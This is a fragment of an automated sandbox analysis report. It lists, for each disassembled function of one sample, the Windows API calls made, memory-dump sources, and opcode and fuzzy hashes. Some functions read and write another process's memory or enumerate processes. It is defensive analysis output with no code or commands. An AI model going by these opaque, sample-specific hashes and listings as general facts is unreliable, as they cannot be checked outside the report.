                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                                                                                                                                                                                • String ID: x#t$x#t$x#t
                                                                                                                                                                                                                                                                • API String ID: 1072379062-2514561250
                                                                                                                                                                                                                                                                • Opcode ID: 5eb0abe5c13051675f70923b0fecfd0bc4ba84250a82c9490b4ad68fb0dbb60e
                                                                                                                                                                                                                                                                • Instruction ID: e04777438adb1b0f6af3bfe26cda23d9a4cd4cd14eee40992926063168454843
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eb0abe5c13051675f70923b0fecfd0bc4ba84250a82c9490b4ad68fb0dbb60e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DC16D71A00109AFDB14EF98C891DBEB7BAEF49300F148169FA15AB291DB70ED45CB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 006A8B6E
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 006A8B7A
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 006A8B81
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                                                                                                                                                                                                • String ID: .i
                                                                                                                                                                                                                                                                • API String ID: 2434981716-2647164722
                                                                                                                                                                                                                                                                • Opcode ID: a386653e51266ebcd5670687cb90bf86fc04500dfd7cd1b3c70f9faeb1a1a7e2
                                                                                                                                                                                                                                                                • Instruction ID: 5353e6a9359748ff0b057722ab8543cfea4630a87829eef504b5a5398fef7f34
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a386653e51266ebcd5670687cb90bf86fc04500dfd7cd1b3c70f9faeb1a1a7e2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D54160B0604145AFDB25AF54C880ABD7FE7DB87304B2881AAF98587652DE35CC028FA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006DB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006D21D0,?,?,00000034,00000800,?,00000034), ref: 006DB42D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006D2760
                                                                                                                                                                                                                                                                  • Part of subcall function 006DB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006D21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 006DB3F8
                                                                                                                                                                                                                                                                  • Part of subcall function 006DB32A: GetWindowThreadProcessId.USER32(?,?), ref: 006DB355
                                                                                                                                                                                                                                                                  • Part of subcall function 006DB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006D2194,00000034,?,?,00001004,00000000,00000000), ref: 006DB365
                                                                                                                                                                                                                                                                  • Part of subcall function 006DB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006D2194,00000034,?,?,00001004,00000000,00000000), ref: 006DB37B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006D27CD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006D281A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: 9d0968765f3cdbb2a872a0bd396bf803fb5d3775ee298d25faaa6cb602158978
                                                                                                                                                                                                                                                                • Instruction ID: d37992d2b03a2f28155a0d984b076cd900de0fdae46f2b822658bdae49946043
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d0968765f3cdbb2a872a0bd396bf803fb5d3775ee298d25faaa6cb602158978
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6414F72D00218AFDB10DBA4CC51EEEBBB9EF15300F00509AFA55B7281DB706E45DBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006DC306
                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 006DC34C
                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00741990,010754B0), ref: 006DC395
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 0f2c6121a08bedfe25fea75d26409e18a922bd55fad0f89348f0808e5e07363c
                                                                                                                                                                                                                                                                • Instruction ID: 519710a6c378a41f5498e19c61ffb1d05f92f80a3cc1f9808181bf1dc63c473a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f2c6121a08bedfe25fea75d26409e18a922bd55fad0f89348f0808e5e07363c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C41BF31A04346DFDB20DF28D884B5ABBE6AF85320F11861EF9A5973D1C730E904CB66
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0070CC08,00000000,?,?,?,?), ref: 007044AA
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32 ref: 007044C7
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007044D7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long
                                                                                                                                                                                                                                                                • String ID: SysTreeView32
                                                                                                                                                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                • Opcode ID: 91ef53047b96758324edb57e52c487b2b8816e8455a12e17325d0e15fa4d6044
                                                                                                                                                                                                                                                                • Instruction ID: e1e66478e879de96f2a1e22fd76208cf89d6f87b095690ebd79752337acede82
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91ef53047b96758324edb57e52c487b2b8816e8455a12e17325d0e15fa4d6044
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1319CB1210245EBDB219F38DC45BEA77A9EB08334F208319FA79922D0DB78AC609750
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SysReAllocString.OLEAUT32(?,?), ref: 006D6EED
                                                                                                                                                                                                                                                                • VariantCopyInd.OLEAUT32(?,?), ref: 006D6F08
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 006D6F12
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$AllocClearCopyString
                                                                                                                                                                                                                                                                • String ID: *jm
                                                                                                                                                                                                                                                                • API String ID: 2173805711-1720354028
                                                                                                                                                                                                                                                                • Opcode ID: da4c27788201152a0c6fd5d9752b8099981ea18968945bfaee912f28e549b3e7
                                                                                                                                                                                                                                                                • Instruction ID: e4938c505bcf07b240d03f7ac1783e22eadf15fe9531d5d4d8e26dcaa33f7e70
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da4c27788201152a0c6fd5d9752b8099981ea18968945bfaee912f28e549b3e7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3231CFB1A04645DBCB05AFA5E8909BE37B7FF80300B10459EF9024B3B1CB349D12CBA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00704705
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00704713
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0070471A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                • Opcode ID: fc6b5b80054ef78ccd870a3b1917b3169a4fdc361cebc785272f88a9729068d0
                                                                                                                                                                                                                                                                • Instruction ID: c93b3136dc82cdf0f40b730f1d3f59ad17eafb89df05c32d7dae3903ab7ee1f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc6b5b80054ef78ccd870a3b1917b3169a4fdc361cebc785272f88a9729068d0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC217CF5600209EFEB10DF68DC91DA637EDEB4A3A4B004149FA009B2A1CB35EC51CA64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 006E4A08
                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006E4A5C
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,0070CC08), ref: 006E4AD0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                • String ID: %lu
                                                                                                                                                                                                                                                                • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                • Opcode ID: 93977e1c30094b7f16fdf09663966fa149141082c638d2b3cd09b2223471431e
                                                                                                                                                                                                                                                                • Instruction ID: ad027e66b38b363e68625cc83f392dd4e73765c27f9cfeff99918cb58212218d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93977e1c30094b7f16fdf09663966fa149141082c638d2b3cd09b2223471431e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19318170A00208AFDB11DF64C885EAA77F9EF08304F1480A9F409DB352DB75ED45CB65
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0070424F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00704264
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00704271
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                • Opcode ID: fccf9f28e5d052cb2fadf88d0f3e2bf4b9544da2480cee5603c03d1b72f6c291
                                                                                                                                                                                                                                                                • Instruction ID: ea3f1cff94321fd0b692d536d0aa9f628970cf00adb2be7ab8bb8d214e8220fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fccf9f28e5d052cb2fadf88d0f3e2bf4b9544da2480cee5603c03d1b72f6c291
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE11C171240208BEEF209F28CC06FAB3BECEF85B64F014218FA55E20D0D675D8619B14
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00676B57: _wcslen.LIBCMT ref: 00676B6A
                                                                                                                                                                                                                                                                  • Part of subcall function 006D2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 006D2DC5
                                                                                                                                                                                                                                                                  • Part of subcall function 006D2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 006D2DD6
                                                                                                                                                                                                                                                                  • Part of subcall function 006D2DA7: GetCurrentThreadId.KERNEL32 ref: 006D2DDD
                                                                                                                                                                                                                                                                  • Part of subcall function 006D2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 006D2DE4
                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 006D2F78
                                                                                                                                                                                                                                                                  • Part of subcall function 006D2DEE: GetParent.USER32(00000000), ref: 006D2DF9
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 006D2FC3
                                                                                                                                                                                                                                                                • EnumChildWindows.USER32(?,006D303B), ref: 006D2FEB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                • String ID: %s%d
                                                                                                                                                                                                                                                                • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                • Opcode ID: d3cbca61e689a25c1c073a604d87042821aa6ae8881d510ff2b9af0dc0cc1516
                                                                                                                                                                                                                                                                • Instruction ID: 08f8c4c9c327fc762a85a1d07ef21181edffdcac21f47ac6e3eccd05056cfe2e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3cbca61e689a25c1c073a604d87042821aa6ae8881d510ff2b9af0dc0cc1516
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5911E471A00205ABDF917F70CC95EEE376BAF94304F04817AF9099B392DE359A498B74
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4edc20ff8f08d7568b8b4f92a6a46c94f43bd7d416f3e88365520cb3844cb588
                                                                                                                                                                                                                                                                • Instruction ID: d48fa68240e5fcc047ed75daf11c009e5ad0fdb11ba66405f8a7f497f505a325
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4edc20ff8f08d7568b8b4f92a6a46c94f43bd7d416f3e88365520cb3844cb588
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33C13775A00216AFEB14CFA4C894BAEB7B6FF48304F218599E505EB351D731EE42CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0070FC08,?), ref: 006D05F0
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0070FC08,?), ref: 006D0608
                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,0070CC40,000000FF,?,00000000,00000800,00000000,?,0070FC08,?), ref: 006D062D
                                                                                                                                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 006D064E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 314563124-0
                                                                                                                                                                                                                                                                • Opcode ID: 12ccf2b7bb54f7e3dbafc153f86e2ba0e0cd765e90ad75d0fa20416209c4024f
                                                                                                                                                                                                                                                                • Instruction ID: 9545daa64f8d00855265fc8d297caacb1aba106b22422b0c37d153784d169273
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12ccf2b7bb54f7e3dbafc153f86e2ba0e0cd765e90ad75d0fa20416209c4024f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96810D75E00109EFDB04DF94C984EEEB7BAFF89315F204599E506AB250DB71AE06CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 006FA6AC
                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 006FA6BA
                                                                                                                                                                                                                                                                  • Part of subcall function 00679CB3: _wcslen.LIBCMT ref: 00679CBD
                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 006FA79C
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006FA7AB
                                                                                                                                                                                                                                                                  • Part of subcall function 0068CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,006B3303,?), ref: 0068CE8A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
